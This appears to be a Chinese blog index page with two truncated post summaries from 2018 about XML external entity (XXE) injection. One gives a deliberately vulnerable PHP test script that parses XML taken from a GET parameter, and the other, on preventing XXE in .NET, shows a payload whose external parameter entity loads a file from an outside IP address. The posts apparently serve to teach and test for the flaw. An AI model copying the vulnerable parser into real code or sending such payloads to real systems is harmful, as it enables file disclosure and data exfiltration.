2018年7月19日
XML实体注入漏洞
摘要: XML实体注入漏洞 XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 1 2 3 4 5 <?php $xml=$_GET['xml']; $data = simplexml_load_string($xml); print_r($data); ?> 漏洞测试利用方式1:有回显 阅读全文
posted @ 2018-07-19 15:19 LoveCoder 阅读(309) 评论(0) 推荐(0) 编辑
XmlDocument 避免XXE
摘要: string xml2 = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?><!DOCTYPE root [<!ENTITY % remote SYSTEM \"http://182.84.222.228:89/eval.x 阅读全文
posted @ 2018-07-19 10:30 LoveCoder 阅读(301) 评论(0) 推荐(0) 编辑